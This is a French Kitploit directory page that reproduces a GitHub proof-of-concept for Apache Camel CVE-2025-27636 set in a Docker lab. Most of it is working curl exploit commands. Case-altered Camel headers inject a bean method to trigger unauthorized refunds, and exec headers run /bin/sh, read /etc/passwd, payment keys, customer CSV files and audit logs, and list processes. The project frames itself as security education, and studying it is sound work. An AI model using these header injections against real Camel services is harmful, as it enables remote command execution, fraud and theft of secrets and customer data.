Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-27636-demo — Démontre la CVE-2025-27636 d'Apache Camel avec une reproduction basée sur Docker d'attaques par injection d'en-têtes, y compris l'injection de méthodes de bean et l'exécution de commandes pour la recherche et l'éducation en sécurité. | Kitploit
Outils/GitHubGitHub/crystallen1/cve-2025-27636-demo
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRed Teaming
GitHubcrystallen1/cve-2025-27636-demo

CVE-2025-27636-demo

Démontre la CVE-2025-27636 d'Apache Camel avec une reproduction basée sur Docker d'attaques par injection d'en-têtes, y compris l'injection de méthodes de bean et l'exécution de commandes pour la recherche et l'éducation en sécurité.

Voir le dépôt
il y a 10 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Démonstration des CVE Apache Camel

Ce projet démontre les vulnérabilités de sécurité dans Apache Camel liées aux attaques par injection d'en-têtes.

Construction Docker

Construire l'image Docker :

root@kitploit:~
docker build -t camel-cve-demo .

Exécution Docker

Exécuter le conteneur avec tous les ports nécessaires :

root@kitploit:~
docker run -d `
  --name camel-cve-demo `
  -p 8080:8080 `
  -p 8081:8081 `
  -p 8484:8484 `
  -v ${PWD}/logs:/app/logs `
  -e JAVA_OPTS="-Xmx512m -Xms256m" `
  camel-cve-demo

Reproduction de l'attaque

1. Attaque par injection de méthode Bean

Exploiter le point de terminaison vulnérable en injectant des noms de méthodes :

root@kitploit:~
# Attaque réussie - en-tête sensible à la casse
curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "cAmelBeanMethodName: processRefund" -d "order_id=ORD999&amount=9999.99"

# Alternative - injection par paramètre de requête
curl.exe "http://localhost:8081/api/payment/callback?cAmelBeanMethodName=processRefund" -X POST -d "order_id=ORD999&amount=9999.99"

Comparaison (ces commandes devraient échouer) :

root@kitploit:~
# Mauvaise casse - ne devrait pas fonctionner
curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "camelbeanmethodname: processRefund" -d "order_id=ORD999&amount=9999.99"

curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "CamelBeanMethodName: processRefund" -d "order_id=ORD999&amount=9999.99"

2. Attaque par exécution de commandes

Exploiter le composant exec pour exécuter des commandes arbitraires :

Reconnaissance :

root@kitploit:~
# Vérifier le répertoire courant
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c pwd"

# Lister le répertoire de configuration
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c ls -la /app/config/"

# Rechercher les fichiers de configuration
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c find / -name database.conf 2>/dev/null"

Exfiltration de données :

root@kitploit:~
# Lire la configuration de la base de données
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs: /etc/app/config/database.conf"

# Lire les secrets de paiement
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs: /app/secrets/payment.key"

# Lire les données clients
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs:/var/data/customers/customers.csv"

# Lire les journaux d'audit
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs:/var/log/audit/audit.log"

# Lire les utilisateurs système
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs:/etc/passwd"

# Lister les processus
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: ps" -H "cAmelExecCommandArgs:aux"

Vérifier les résultats de l'attaque

Consulter les journaux d'attaque dans le conteneur :

root@kitploit:~

# Afficher les tentatives de remboursement non autorisées
docker exec camel-cve-demo cat /tmp/unauthorized_refund.txt

Ports

  • 8080 : Application principale (interface frontale)
  • 8081 : Point de terminaison vulnérable à l'injection Bean
  • 8484 : Point de terminaison vulnérable à l'injection Exec
Télécharger l’outil